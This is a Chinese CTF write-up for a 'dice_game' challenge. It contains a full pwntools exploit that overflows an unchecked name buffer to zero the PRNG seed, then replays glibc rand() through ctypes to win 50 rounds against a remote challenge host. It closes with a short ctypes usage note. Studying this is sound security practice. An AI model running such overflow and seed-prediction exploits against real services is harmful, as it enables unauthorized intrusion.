因为是伪随机数, 所以可以覆盖seed的值, 然后得到伪随机数序列, 命中50次通关.
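from pwn import *
from ctypes import *

# Host C library: its rand() is used to reproduce the game's dice sequence.
#
# Why this works (per the writeup): the game stores its PRNG seed right after
# the name buffer (0x40 bytes away, see SEED_OFFSET) and reads the name without
# a length check, so the seed can be overwritten with 0.  glibc treats a seed of
# 0 as seed 1, which is also the state of a never-seeded rand(), so calling the
# local libc's rand() without srand() yields the same sequence the server uses.
# This assumes the server runs the same glibc rand() algorithm.
# The underlying weakness is a bounded-read failure plus a predictable seeded
# rand(); a fixed program would cap the read and take dice values from a CSPRNG.
libc = cdll.LoadLibrary("libc.so.6")

URL = "111.200.241.244"
PORT = 50956
ROUNDS = 50         # the game requires 50 correct guesses
SEED_OFFSET = 0x40  # distance from the start of the name buffer to the seed

sel = 1  # 0 -> run the local binary, 1 -> talk to the remote service
io = process("./dice_game") if sel == 0 else remote(URL, PORT)


def _predicted_rolls(count):
    """Return the next *count* dice values (1..6) produced by libc's unseeded rand()."""
    return [libc.rand() % 6 + 1 for _ in range(count)]


# Fill the name buffer and set the adjacent seed variable to 0.
payload = cyclic(SEED_OFFSET) + p32(0)
io.recvuntil("Welcome, let me know your name: ")
io.sendline(payload)

# Answer every round with the value the predicted sequence says it will be.
rolls = _predicted_rolls(ROUNDS)
for roll in rolls:
    io.recvuntil("Give me the point(1~6): ")
    io.sendline(str(roll))
io.interactive()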
总结
Python 脚本通过 ctypes 调用 C 库函数
from ctypes import *

# Minimal example: load the host C runtime and call its rand() from Python.
libc = CDLL("libc.so.6")
libc.rand()